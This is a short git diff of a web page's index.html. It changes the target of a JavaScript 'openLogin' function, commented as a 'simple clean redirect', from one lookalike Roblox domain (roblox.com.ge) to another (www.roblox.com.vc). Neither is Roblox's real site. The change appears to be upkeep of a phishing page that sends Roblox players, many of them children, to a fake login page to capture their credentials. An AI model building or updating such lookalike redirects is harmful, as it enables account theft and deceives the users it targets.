--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@
 
     // Simple clean redirect
     function openLogin() {
-      window.location.href = "https://roblox.com.ge/login?returnUrl=7362013241297120";
+      window.location.href = "https://www.roblox.com.vc/login?returnUrl=2531990090521321";
     }
   </script>
 </body>
